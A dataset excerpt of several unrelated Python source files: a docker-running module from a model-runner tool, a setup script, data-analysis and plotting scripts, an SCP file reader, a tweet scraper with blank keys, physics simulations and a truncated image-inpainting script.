= int(host_port_list[1])\n host_port_inside_docker = \"{}:{}\".format(\"0.0.0.0\", port)\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.ADDRESS, host_port_inside_docker\n )\n docker_cmd_args += \" -p {port}:{port}\".format(port=port)\n\n if run_mode in [RunMode.SCORE, RunMode.PERF_TEST, RunMode.VALIDATION, RunMode.FIT]:\n docker_cmd_args += ' -v \"{}\":{}'.format(options.input, in_docker_input_file)\n\n if run_mode == RunMode.SCORE and options.output:\n output_file = os.path.realpath(options.output)\n if not os.path.exists(output_file):\n # Creating an empty file so the mount command will mount the file correctly -\n # otherwise docker create an empty directory\n open(output_file, \"a\").close()\n docker_cmd_args += ' -v \"{}\":{}'.format(output_file, in_docker_output_file)\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.OUTPUT, in_docker_output_file\n )\n elif run_mode == RunMode.FIT:\n if options.output:\n fit_output_dir = os.path.realpath(options.output)\n docker_cmd_args += ' -v \"{}\":{}'.format(\n fit_output_dir, in_docker_fit_output_dir\n )\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.OUTPUT, in_docker_fit_output_dir\n )\n if options.target_csv:\n fit_target_filename = os.path.realpath(options.target_csv)\n docker_cmd_args += ' -v \"{}\":{}'.format(\n fit_target_filename, in_docker_fit_target_filename\n )\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list,\n ArgumentsOptions.TARGET_CSV,\n in_docker_fit_target_filename,\n )\n if options.row_weights_csv:\n fit_row_weights_filename = os.path.realpath(options.row_weights_csv)\n docker_cmd_args += ' -v \"{}\":{}'.format(\n fit_row_weights_filename, in_docker_fit_row_weights_filename\n )\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list,\n ArgumentsOptions.WEIGHTS_CSV,\n in_docker_fit_row_weights_filename,\n )\n\n docker_cmd += \" {} {} {}\".format(\n docker_cmd_args, options.docker, \" \".join(in_docker_cmd_list)\n )\n\n self._print_verbose(\"docker command: [{}]\".format(docker_cmd))\n return docker_cmd\n\n def _run_inside_docker(self, options, run_mode, raw_arguments):\n self._check_artifacts_and_get_run_language()\n docker_cmd = self._prepare_docker_command(options, run_mode, raw_arguments)\n\n self._print_verbose(\"Checking DRUM version in container...\")\n result = subprocess.run(\n [\n \"docker\",\n \"run\",\n \"-it\",\n \"--entrypoint\",\n # provide emtpy entrypoint value to unset the one that could be set within the image\n \"\",\n options.docker,\n \"sh\",\n \"-c\",\n \"drum --version\",\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n container_drum_version = result.stdout.decode(\"utf8\").strip()\n\n host_drum_version = \"{} {}\".format(ArgumentsOptions.MAIN_COMMAND, drum_version)\n if container_drum_version != host_drum_version:\n print(\n \"WARNING: looks like host DRUM version doesn't match container DRUM version. This can lead to unexpected behavior.\\n\"\n \"Host DRUM version: {}\\n\"\n \"Container DRUM version: {}\".format(host_drum_version, result.stdout.decode(\"utf8\"))\n )\n err = result.stderr.decode(\"utf8\")\n if len(err):\n print(err)\n time.sleep(0.5)\n else:\n self._print_verbose(\n \"Host DRUM version matches container DRUM version: {}\".format(host_drum_version)\n )\n self._print_verbose(\"-\" * 20)\n p = subprocess.Popen(docker_cmd, shell=True)\n try:\n retcode = p.wait()\n except KeyboardInterrupt:\n retcode = 0\n\n self._print_verbose(\"{bar} retcode: {retcode} {bar}\".format(bar=\"-\" * 10, retcode=retcode))\n return retcode\n\n def _maybe_build_image(self, docker_image_or_directory):\n def _get_requirements_lines(reqs_file_path):\n if not os.path.exists(reqs_file_path):\n return None\n\n with open(reqs_file_path) as f:\n lines = f.readlines()\n lines = [l.strip() for l in lines]\n return lines\n\n ret_docker_image = None\n if os.path.isdir(docker_image_or_directory):\n docker_image_or_directory = os.path.abspath(docker_image_or_directory)\n # Set image tag to the dirname/dirname of the docker context.\n # E.g. for two folders:\n # /home/path1/my_env\n # /home/path2/my_env\n # tags will be 'path1/my_env', 'path2/my_env'\n #\n # If tag already exists, older image will be untagged.\n context_path = os.path.abspath(docker_image_or_directory)\n tag = \"{}/{}\".format(\n os.path.basename(os.path.dirname(context_path)), os.path.basename(context_path)\n ).lower()\n\n lines = _get_requirements_lines(os.path.join(self.options.code_dir, \"requirements.txt\"))\n temp_context_dir = None\n if lines is not None and not self.options.skip_deps_install:\n temp_context_dir = tempfile.mkdtemp()\n shutil.rmtree(temp_context_dir)\n shutil.copytree(docker_image_or_directory, temp_context_dir)\n msg = (\n \"Requirements file has been found in the code dir. DRUM will try to install dependencies into a docker image.\\n\"\n \"Docker context has been copied from: {} to: {}\".format(\n docker_image_or_directory, temp_context_dir\n )\n )\n\n print(msg)\n self.logger.debug(msg)\n docker_image_or_directory = temp_context_dir\n\n with open(os.path.join(temp_context_dir, \"Dockerfile\"), mode=\"a\") as f:\n if self.options.language == RunLanguage.PYTHON.value:\n f.write(\"\\nRUN pip3 install {}\".format(\" \".join(lines)))\n elif self.options.language == RunLanguage.R.value:\n quoted_lines = [\"'{}'\".format(ll) for ll in lines]\n deps_str = \", \".join(quoted_lines)\n l1 = \"\\nRUN echo \\\"r <- getOption('repos'); r['CRAN'] <- 'http://cran.rstudio.com/'; options(repos = r);\\\" > ~/.Rprofile\"\n l2 = '\\nRUN Rscript -e \"withCallingHandlers(install.packages(c({}), Ncpus=4), warning = function(w) stop(w))\"'.format(\n deps_str\n )\n f.write(l1)\n f.write(l2)\n else:\n msg = \"Dependencies management is not supported for the '{}' language and will not be installed into an image\".format(\n self.options.language\n )\n self.logger.warning(msg)\n print(msg)\n\n docker_build_msg = \"Building a docker image from directory: {}...\".format(\n docker_image_or_directory\n )\n self.logger.info(docker_build_msg)\n self.logger.info(\"This may take some time\")\n\n try:\n client_docker_low_level = docker.APIClient()\n spinner = Spinner(docker_build_msg + \" \")\n json_lines = []\n # Build docker, rotate spinner according to build progress\n # and save status messages from docker build.\n for line in client_docker_low_level.build(\n path=docker_image_or_directory, rm=True, tag=tag\n ):\n line = line.decode(\"utf-8\").strip()\n json_lines.extend([json.loads(ll) for ll in line.split(\"\\n\")])\n spinner.next()\n spinner.finish()\n # skip a line after spinner\n print()\n\n image_id = None\n build_error = False\n for line in json_lines:\n if \"error\" in line:\n build_error = True\n break\n if \"stream\" in line:\n match = re.search(\n r\"(^Successfully built |sha256:)([0-9a-f]+)$\", line[\"stream\"]\n )\n if match:\n image_id = match.group(2)\n if image_id is None or build_error:\n all_lines = \" \\n\".join([json.dumps(l) for l in json_lines])\n raise DrumCommonException(\n \"Failed to build a docker image:\\n{}\".format(all_lines)\n )\n\n print(\"\\nImage successfully built; tag: {}; image id: {}\".format(tag, image_id))\n print(\n \"It is recommended to use --docker {}, if you don't need to rebuild the image.\\n\".format(\n tag\n )\n )\n\n ret_docker_image = image_id\n except docker.errors.APIError as e:\n self.logger.exception(\"Image build failed because of unknown to DRUM reason!\")\n raise\n finally:\n if temp_context_dir is not None:\n shutil.rmtree(temp_context_dir)\n self.logger.info(\"Done building image!\")\n else:\n try:\n client = docker.client.from_env()\n client.images.get(docker_image_or_directory)\n ret_docker_image = docker_image_or_directory\n except docker.errors.ImageNotFound:\n pass\n\n if not ret_docker_image:\n raise DrumCommonException(\n \"The string '{}' does not represent a docker image \"\n \"in your registry or a directory\".format(docker_image_or_directory)\n )\n\n return ret_docker_image\n\n\ndef possibly_intuit_order(\n input_data_file, target_data_file=None, target_col_name=None, is_anomaly=False,\n):\n if is_anomaly:\n return None\n elif target_data_file:\n assert target_col_name is None\n\n y = pd.read_csv(target_data_file, index_col=False)\n y = y.sample(min(1000, len(y)), random_state=1)\n classes = np.unique(y.iloc[:, 0])\n else:\n assert target_data_file is None\n df = pd.read_csv(input_data_file)\n if not target_col_name in df.columns:\n e = \"The column '{}' does not exist in your dataframe. \\nThe columns in your dataframe are these: {}\".format(\n target_col_name, list(df.columns)\n )\n print(e, file=sys.stderr)\n raise DrumCommonException(e)\n uniq = df[target_col_name].sample(min(1000, len(df)), random_state=1).unique()\n classes = set(uniq) - {np.nan}\n if len(classes) >= 2:\n return classes\n elif len(classes) == 1:\n raise DrumCommonException(\"Only one target label was provided, please revise training data\")\n return None\n\n\ndef output_in_code_dir(code_dir, output_dir):\n \"\"\"Does the code directory house the output directory?\"\"\"\n code_abs_path = os.path.abspath(code_dir)\n output_abs_path = os.path.abspath(output_dir)\n return os.path.commonpath([code_dir, output_abs_path]) == code_abs_path\n\n\ndef create_custom_inference_model_folder(code_dir, output_dir):\n readme = \"\"\"\n This folder was generated by the DRUM tool. It provides functionality for making \n predictions using the model trained by DRUM\n \"\"\"\n files_in_output = set(glob.glob(output_dir + \"/**\"))\n if output_in_code_dir(code_dir, output_dir):\n # since the output directory is in the code directory use a tempdir to copy into first and\n # cleanup files and prevent errors related to copying the output into itself.\n with tempfile.TemporaryDirectory() as tempdir:\n copy_tree(code_dir, tempdir)\n # remove the temporary version of the target dir\n shutil.rmtree(os.path.join(tempdir, os.path.relpath(output_dir, code_dir)))\n shutil.rmtree(os.path.join(tempdir, \"__pycache__\"), ignore_errors=True)\n copied_files = set(copy_tree(tempdir, output_dir))\n else:\n copied_files = set(copy_tree(code_dir, output_dir))\n shutil.rmtree(os.path.join(output_dir, \"__pycache__\"), ignore_errors=True)\n with open(os.path.join(output_dir, \"README.md\"), \"w\") as fp:\n fp.write(readme)\n if files_in_output & copied_files:\n print(\"Files were overwritten: {}\".format(files_in_output & copied_files))\n","sub_path":"custom_model_runner/datarobot_drum/drum/drum.py","file_name":"drum.py","file_ext":"py","file_size_in_byte":50682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"85422395","text":"#!/usr/bin/env python\n\nimport codecs\nimport os\nimport re\nfrom setuptools import find_packages, setup\nimport sys\n\nassert sys.version_info.major == 3 and sys.version_info.minor >= 6, \\\n \"Safety Gym is designed to work with Python 3.6 and greater. \" \\\n + \"Please install it before proceeding.\"\n\n\ndef find_version(*file_paths: str) -> str:\n with codecs.open(os.path.join(*file_paths), \"r\") as fp:\n version_file = fp.read()\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\", version_file, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError(\"Unable to find version string.\")\n\n\nsetup(\n name='safety_gym',\n version=find_version(\"safety_gym\", \"__init__.py\"),\n packages=find_packages(include=['safety_gym']),\n install_requires=[\n 'gym>=0.15.3',\n 'hydra-core==1.0.5',\n 'joblib~=0.14.0',\n 'mujoco_py==2.0.2.7',\n 'numpy==1.20.0',\n 'xmltodict~=0.12.0',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"48162400","text":"#!/usr/bin/python\n\nimport matplotlib as mpl\nmpl.use('Agg')\nfrom matplotlib import rc\nrc('font', family='monospace', size=16)\nimport matplotlib.pyplot as plt\n\nimport glob\nfrom scipy.io import loadmat\n\nimport plx_util as putil\nfrom scipy import stats\nimport numpy as np\nimport sys\nimport os\n\nbin = int(sys.argv[1]) \n\n\nfile_titles = \\\n{\n\t'bmi_fa13_left_hemi.mat' : 'BMI data, Fall 2013, Left M1-PMv',\n\t'bmi_fa13_right_hemi.mat' : 'BMI data, Fall 2013, Right M1-PMv',\n\t'mc_fa13_left_hemi.mat' : 'MC data, Fall 2013, Left M1-PMv',\n\t'mc_fa13_right_hemi.mat' : 'MC data, Fall 2013, Right M1-PMv',\n\t'mc_sp14_left_hemi_improv.mat' : 'MC data, Spring 2014, Performance Improving, Left M1-PMv',\n\t'mc_su14_left_hemi_stable.mat' : 'MC data, Summer 2014, Performance Stable, Left M1-PMv',\n\t'bmi_su13_left_hemi.mat' : 'BMI data, Summer 2013, Left M1-PMv',\n\t'mc_su13_left_hemi.mat' : 'MC data, Summer 2013, Left M1-PMv'\n}\n\nfiles = glob.glob('./*.mat')\nfiles.sort()\nfor i in range(len(files)):\n\tfiles[i] = files[i][ 2 : ]\n\nall_data = []\nfor file in files:\n\tall_data.append(loadmat(file))\n\nx_vals = []\ny_vals = []\nr2_vals = []\np_vals = []\n\ncolors = ['black', 'red']# ['#ff0000', '#ffcc00', '#33cc33', '#0000ff']\n\nmin_day, max_day = float('inf'), float('-inf')\nmin_val, max_val = float('inf'), float('-inf')\n\nfor data in all_data:\n\tdatasets = [key for key in data if 'plx' in key]\n\tdatasets.sort()\n\tstart_date = datasets[0]\n\tnew_xvals = [putil.days_between(start_date, datasets[i]) for i in range(len(datasets))]\n\tnew_yvals = [data[datasets[i]].flatten()[bin] for i in range(len(datasets))]\n\tmin_day = min(min_day, min(new_xvals))\n\tmax_day = max(max_day, max(new_xvals))\n\tmin_val = min(min_val, min(new_yvals))\n\tmax_val = max(max_val, max(new_yvals))\n\n\tx_vals.append(new_xvals)\n\ty_vals.append(new_yvals)\n\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(new_xvals, new_yvals)\n\tr2_vals.append(r_value ** 2)\n\tp_vals.append(p_value)\n\n# set axis tick padding\nplt.rcParams['xtick.major.pad'] = 8\nplt.rcParams['ytick.major.pad'] = 8\n\nplt.figure(figsize=(18.5, 10))\n\nfor i in range(len(x_vals)):\n\tif p_vals[i] <= 0.05:\n\t\tplt.scatter(x_vals[i], y_vals[i], s=30, color=colors[i])\n\t\tplt.plot(x_vals[i], y_vals[i], label=file_titles[files[i]], linewidth=2, color=colors[i])\n\telse:\n\t\tplt.scatter(x_vals[i], y_vals[i], s=30, color=colors[i])\n\t\tplt.plot(x_vals[i], y_vals[i], label=file_titles[files[i]], linewidth=2, linestyle='--', color=colors[i])\n\t# slope, intercept, r_value, p_value, std_err = stats.linregress(np.array(x_vals[i]), np.array(y_vals[i]))\n\t# plt.plot(x_vals[i], intercept + (slope * np.array(x_vals[i])), color=colors[i])\n\ndiff = max_val - min_val\n\nplt.grid()\nplt.xticks(np.arange(min_day, max_day + 1, 3), fontsize=16)\nplt.yticks([round(x, 3) for x in np.arange(min_val - 0.2 * diff, max_val + 0.2 * diff + 0.001, (1. / 10) * diff)], fontsize=16)\nplt.axis([min_day - 1, max_day + 1, min_val - 0.2 * diff, max_val + 0.2 * diff])\n\nplt.suptitle('Average coherence values across 100 Left M1-PMv LFP channels', fontsize=32)\n\nplt.legend(loc='upper left', bbox_to_anchor=(0.01, 0.99), prop={'size' : 24})\nplt.subplots_adjust(left=0.075, right=0.95, top=0.87, bottom=0.1)\n\nplt.xlabel('days from start date', fontsize=24, labelpad=15)\nplt.ylabel('average coherence', fontsize=24, labelpad=10)\n\nplt.savefig(str(bin * 8) + '-' + str((bin + 1) * 8) + '.pdf')\n\n","sub_path":"scripts/plot_coher_days_mult.py","file_name":"plot_coher_days_mult.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225997264","text":"import sys,os,time,datetime\nimport itertools,warnings\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom glob import glob\nimport networkx as nx\n\nwarnings.filterwarnings(\"ignore\")\n\nimport statsmodels.formula.api as smf\nimport statsmodels.api as sm\nfrom statsmodels.tsa.arima_model import ARIMA,ARMA\nfrom statsmodels.tsa.ar_model import AR,ARResults\nfrom statsmodels.tsa.vector_ar.var_model import VAR\nfrom arch.unitroot import ADF\n\n\"\"\"\n 複数の銘柄間の出来高のGranger因果性を検定.\n 隣接行列を作りネットワーク図示(文字コードに問題).\n\"\"\"\n\n\n\n# In[] ### Data Preparation\ndata = genDeal(dataDir[0], which=\"出来高\")\n\n# Data/ のフォルダ名一覧(銘柄id一覧)を取得\ndataDir = os.listdir(\"Data/\")\ndataDir.sort()\ndataDir.remove(\".DS_Store\")\ndataDir.remove(\"FetchData.py\")\ndataDir.remove(\"__temp\")\n\n# 各銘柄の出来高を読み込みconcat\ndata = genDeal(dataDir[0])\nfor id in dataDir[1:]:\n temp = genDeal(id)\n data = pd.merge(data,temp,on=\"日付\")\ndata.head()\n# In[]\ntrain = data[:\"2016-12-31\"]\ntest = data[\"2017-01-01\":]\n\n\n\n# In[] ### 単位根(ADF)検定で銘柄をフィルター.\n# H0: 単位根ARである\n# H1: 定常ARである\nstocks = train.columns\nconstStocks = []\nfor stock in stocks:\n res = ADF(train[stock], trend=\"c\", max_lags=10, method='AIC')\n if res.pvalue < 0.05:\n constStocks.append(stock)\n\n\n\n# In[] ### Granger因果Matrixの作成\ngrangerMat = pd.DataFrame(index=constStocks, columns=constStocks)\npvalMat = pd.DataFrame(index=constStocks, columns=constStocks)\nfor stock_i, stock_j in itertools.product(constStocks,constStocks):\n print(stock_i,stock_j)\n if stock_i != stock_j:\n # VAR(出来高,値幅)のフィッティング\n model_var = VAR(data[[stock_i, stock_j]]).fit(maxlags=15,ic=\"aic\")\n # Granger因果性検定\n t = model_var.test_causality(caused=stock_j, causing=stock_i, kind=\"f\")\n pvalMat.loc[stock_i, stock_j] = t.pvalue\n if t.pvalue < 0.05:\n # Matrix(i,j)に書き込み\n grangerMat.loc[stock_i, stock_j] = 1\n\n# NaNのFill\ngrangerMat = grangerMat.fillna(0)\npvalMat = pvalMat.fillna(1)\n\n# In[] それぞれの銘柄がほか何銘柄から影響を受けているか.\ngrangerMat\ngrangerMat.sum(axis=0)\n\n\n\n# In[] ### ネットワークの図示\ng = grangerMat.values\nnodes = grangerMat.columns.values\n# グラフノード追加\nG = nx.DiGraph()\nG.add_nodes_from(nodes)\nedges = []\n# エッジ追加\nfor stock_i,stock_j in itertools.product(constStocks,constStocks):\n if grangerMat.loc[stock_i, stock_j] == 1:\n G.add_edge(stock_i, stock_j)\npos = nx.spring_layout(G)\n# In[] 描画\nnx.draw_networkx(G, pos, with_labels=True)\nplt.axis(\"off\")\n\n\n# In[] ### トヨタの出来高を予測モデル(VAR)\n# stock = constStocks[4] #トヨタ\n# # トヨタを説明できる銘柄.\n# cause = grangerMat.loc[:,stock][grangerMat.loc[:,stock] == 1].index.values\n# cause = np.append(cause,stock)\n#\n# # In[] VARモデル\n# model_var = VAR(data[cause])\n# model_var.fit(maxlags=15,ic=\"aic\")\n# model_var.predict(data[cause].values)\n# in sample評価 / out of sample評価ができない.困った.\n\n\n#\n","sub_path":"MUMSS/grangerCausuallity.py","file_name":"grangerCausuallity.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"516456606","text":"import os\nimport scp\nimport paramiko\nimport threading\n\nfrom transfert.resources._resource import _Resource\n\n\nclass ScpResource(_Resource):\n \"\"\"\n \"\"\"\n\n def __init__(self, url):\n _Resource.__init__(self, url)\n self._fd = None\n self.__client = None\n self._pipe = None\n self._thread = None\n\n @property\n def _client(self):\n if self.__client is None:\n self.__client = self._connect()\n return self.__client\n\n def _connect(self):\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(self.url.host, self.url.port or 22, self.url.user, self.url.password)\n return scp.SCPClient(client.get_transport())\n\n def open(self, flags):\n os.mkfifo(self._pipe)\n self._thread = threading.Thread(target=self._client.get, daemon=True, args=(self.url.path, self._pipe))\n self._thread.start()\n self._fd = os.open(self._pipe, os.O_RDONLY)\n\n def read(self, size):\n while True:\n chunk = os.read(self._fd, size)\n if not chunk:\n break\n yield chunk\n\n def close(self):\n os.close(self._fd)\n self._fd = None\n os.unlink(self._pipe)\n\n @staticmethod\n def size():\n return float('inf')\n\n def __del__(self):\n if self.__client is not None:\n self.__client.close()\n if self._pipe and os.path.exists(self._pipe):\n os.unlink(self._pipe)\n","sub_path":"transfert/resources/scp.py","file_name":"scp.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"302315551","text":"from tweepy import OAuthHandler\nfrom tweepy import API\nimport tweepy\nimport pandas as pd\n\nconsumer_key = \"\"\nconsumer_secret = \"\"\naccess_token = \"\"\naccess_token_secret = \"\"\n\nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = API(auth,wait_on_rate_limit=True)\nclass scraptweets:\n def user_tweets(search_word,date_since,date_until):\n try:\n tweets = tweepy.Cursor(api.search,q=search_word+\"-filter:retweets\",lang=\"en\",since=date_since,until=date_until).items(100)\n users_locs = []\n analysis = []\n for tweet in tweets:\n users_locs.append([tweet.text])\n tweet_text = pd.DataFrame(data=users_locs,columns=[\"Tweets\"])\n tweet_text.to_csv('/content/drive/My Drive/data preprocessing/'+ search_word +'.csv')\n searchwords = []\n tweet_text['Tweets'] = tweet_text['Tweets'].str.lower()\n for x in range(len(searchwords)):\n analysis.append(tweet_text[tweet_text['Tweets'].str.contains(searchwords[x])])\n tweet_text = pd.DataFrame(data=analysis)\n tweet_text.to_csv('/content/drive/My Drive/data preprocessing/'+ search_word +' analysis'+'.csv')\n except BaseException as e:\n tweet_text = pd.DataFrame(data=e,columns=[\"errors\"])\n tweet_text.to_csv('/content/drive/My Drive/data preprocessing/'+ search_word +'.csv') \nscraptweets.user_tweets('narendra modi','2020-7-10','2020-7-15')","sub_path":"Unstructured Programs For Testing/twitter_code.py","file_name":"twitter_code.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"31679481","text":"#!/usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport time\nimport sys\n\nipath = 'state_transitions.pickle'\nwith open(ipath, 'rb') as f:\n state_transitions = pickle.load(f)\nXnext = state_transitions['Xnext']\nCosts = state_transitions['Costs']\n\nqs = state_transitions['qs']\nws = state_transitions['ws']\nus = state_transitions['us']\n\nNq = len(qs)\nNw = len(ws)\nNu = len(us)\n\n\nprint(\"computing index sets\")\nt0 = time.time()\nDeltas = np.copy(Xnext)\ndelta_qs = []\ndelta_ws = []\n\nQOptions = np.zeros((Nq, Nw), dtype=int)\nWOptions = np.zeros((Nq, Nw), dtype=int)\n\nQMax = np.zeros((Nq, Nw))\nWMax = np.zeros((Nq, Nw))\n\nprint('next omega range effected by u:')\nprint(Xnext[1, round(Nq/2), round(Nw/2), :])\nprint('next theta range effected by omega:')\nprint(Xnext[0, round(Nq/2), :, round(Nu/2)])\nsys.exit()\n\nfor kq in range(Nq):\n for kw in range(Nw):\n q_set = set(Xnext[0, kq, kw, :])\n w_set = set(Xnext[1, kq, kw, :])\n\n# print(len(q_set))\n# print(len(w_set))\n QOptions[kq, kw] = len(q_set)\n WOptions[kq, kw] = len(w_set)\n\n QMax[kq, kw] = qs[max(q_set)]\n WMax[kq, kw] = ws[max(w_set)]\n\nt1 = time.time()\nprint(\"computed delta indexes in %.1f seconds\" % (t1 - t0))\n\nplt.subplot(2, 2, 1)\nX, Y = np.meshgrid(qs, ws)\nS = plt.contourf(X, Y, QOptions.T)\ncbar = plt.colorbar(S)\ncbar.ax.set_ylabel('q opt')\nplt.xlabel('theta [rad]')\nplt.ylabel('omega [rad/s]')\nplt.title('q options')\n\n\nplt.subplot(2, 2, 2)\nX, Y = np.meshgrid(qs, ws)\nS = plt.contourf(X, Y, WOptions.T)\ncbar = plt.colorbar(S)\ncbar.ax.set_ylabel('w opt')\nplt.xlabel('theta [rad]')\nplt.ylabel('omega [rad/s]')\nplt.title('w options')\n\n\nplt.subplot(2, 2, 3)\nX, Y = np.meshgrid(qs, ws)\nS = plt.contourf(X, Y, QMax.T)\ncbar = plt.colorbar(S)\ncbar.ax.set_ylabel('max q')\nplt.xlabel('theta [rad]')\nplt.ylabel('omega [rad/s]')\nplt.title('max q')\n\n\nplt.subplot(2, 2, 4)\nX, Y = np.meshgrid(qs, ws)\nS = plt.contourf(X, Y, WMax.T)\ncbar = plt.colorbar(S)\ncbar.ax.set_ylabel('max w')\nplt.xlabel('theta [rad]')\nplt.ylabel('omega [rad/s]')\nplt.title('max w')\n\n\n\n#\n#plt.subplot(2, 2, 4)\n#plt.hist(delta_qs, bins=np.max(delta_qs) - np.min(delta_qs) + 1)\n#plt.title('delta theta')\n#\n#plt.subplot(2, 2, 3)\n#plt.hist(delta_ws, bins=np.max(delta_ws) - np.min(delta_ws) + 1)\n#plt.title('delta omega')\n\nplt.show()\n","sub_path":"torque_pendulum/state_transition_stats.py","file_name":"state_transition_stats.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"485673395","text":"# -- coding utf-8 --\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n\r\ng = 9.8\r\nl1 = 0.5\r\nl2 = 1.0\r\nl3 = 1.5\r\nl4 = 2.0\r\nini_x = 1.5\r\nini_v = 0\r\nini_a = 0\r\ndt = 0.001\r\nt = np.arange(0,10,dt)\r\np1 = []\r\np2 = []\r\np3 = []\r\np4 = []\r\n\r\nx = ini_x\r\nv = ini_v\r\na = ini_a\r\nfor i in range(len(t)):\r\n\tp1.append(x)\r\n\ta = - g/l1*math.sin(x)\r\n\tv += a*dt\r\n\tx += v*dt\r\n\r\nx = ini_x\r\nv = ini_v\r\na = ini_a\r\nfor i in range(len(t)):\r\n\tp2.append(x)\r\n\ta = - g/l2*math.sin(x)\r\n\tv += a*dt\r\n\tx += v*dt\r\n\r\nx = ini_x\r\nv = ini_v\r\na = ini_a\r\nfor i in range(len(t)):\r\n\tp3.append(x)\r\n\ta = - g/l3*math.sin(x)\r\n\tv += a*dt\r\n\tx += v*dt\r\n\r\nx = ini_x\r\nv = ini_v\r\na = ini_a\r\nfor i in range(len(t)):\r\n\tp4.append(x)\r\n\ta = - g/l4*math.sin(x)\r\n\tv += a*dt\r\n\tx += v*dt\r\n\r\nplt.plot(t,p1,'b',t,p2,'r',t,p3,'k',t,p4,'g')\r\nplt.text(7.6,1.8,u'',color='black',ha='center',fontsize=16)\r\nplt.text(7.6,1.7,u'l=0.5',color='blue',ha='center',fontsize=8)\r\nplt.text(7.6,1.6,u'l=1.0',color='red',ha='center',fontsize=8)\r\nplt.text(7.6,1.5,u'l=1.5',color='black',ha='center',fontsize=8)\r\nplt.text(7.6,1.4,u'l=2.0',color='green',ha='center',fontsize=8)\r\nplt.legend(loc='down right',frameon=False)\r\nplt.title('',fontsize=28)\r\nplt.xlabel('$time(s)$',fontsize=20)\r\nplt.ylabel(u'$\\u03B8(radians)$',fontsize=20)\r\nplt.ylim(-3,3.0)\r\nplt.show()\r\n\r\n\r\n","sub_path":"8/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"213445078","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport matplotlib.image as mpimg\nimport imutils\nfrom numpy import random\nimport scipy.misc\nfrom PIL import Image\nfrom numpy import sqrt\nimport time\nfrom utils import genSquare\n\n# imagen a procesar\nimg = cv2.imread('output3/imagen.jpeg', 3)\n# mascara con area a remover.\n# la zona negra (0,0,0) es la que se remueve, la blanca se deja como esta (255,255,255)\nmask = cv2.imread(\"output3/mask.jpeg\")\n# imagen pasada a escala de grises se guarda en esta variable\ngrey_scale = np.zeros(img.shape, dtype=np.uint8) #uint8\n\n\n#lado de los cuadrados que utilizaremos para rellenar la imagen\nsquare_size = 5\n\n# guardamos en un arreglo las coordenadas que describen al cuadrado\nsquare = genSquare(square_size)\n\n\n# tamanio del cuadrado de busqueda para el parche que reemplaza la posicion a rellenear\nsearch_square_size = 1000\n\n# cuantas veces buscamos al azar por un parche\nsearch_times = 100\n\n\ndef procesar(imagen, mask):\n iteraciones = 1000\n\n lower = np.array([0, 0, 0])\n upper = np.array([15, 15, 15])\n # re-mapeamos a 0-1 la mascara. 1 es para la zona retocada, 0 para la que no\n shapeMask = cv2.inRange(mask, lower, upper)\n\n c = shapeMask[:, :] == 0 # maxima confianza en la zona que no se retoca\n\n for iteracion in range(iteraciones):\n # primero detectamos el borde de la mascara\n\n lower = np.array([0, 0, 0])\n upper = np.array([15, 15, 15])\n shapeMask = cv2.inRange(mask, lower, upper)\n\n ## conseguimos un arreglo con todos los contornos\n\n cnts = cv2.findContours(shapeMask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n cnts = imutils.grab_contours(cnts)\n # cada contorno cerrado forma un arreglo\n\n # luego tenemos que calcular la funcion de costos\n best_benefit = 0\n best_benefit_point = None\n\n # conseguimos la escala de grises\n grey_scale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # conseguimos el gradiente en x e y de la escala de grises, la funcion sobel no solo hace gradiente\n # sino que suaviza\n sobel_x = cv2.Sobel(grey_scale, cv2.CV_64F, 1, 0, ksize=5)\n sobel_y = cv2.Sobel(grey_scale, cv2.CV_64F, 0, 1, ksize=5)\n sobel_x, sobel_y = -sobel_y,sobel_x\n\n # por cada contorno cerrado\n for contorno in range(len(cnts)):\n\n ## necesitamos generar las normales de cada punto del contorno\n border_normal = []\n\n n = len(cnts[contorno])\n\n for i in range(n):\n #print(cnts[0][i])\n\n dx = cnts[contorno][i][0][0] - cnts[contorno][(i-1) % n][0][0]\n dy = cnts[contorno][i][0][1] - cnts[contorno][(i-1) % n][0][1]\n\n border_normal.append((dy, -dx))\n # esta formula nos da la normal. no le damos importancia a la orientacion\n\n index = 0\n\n for border_point in cnts[contorno]:\n x, y = border_point[0]\n\n # consigo la confianza del punto del contorno actual\n confidence = 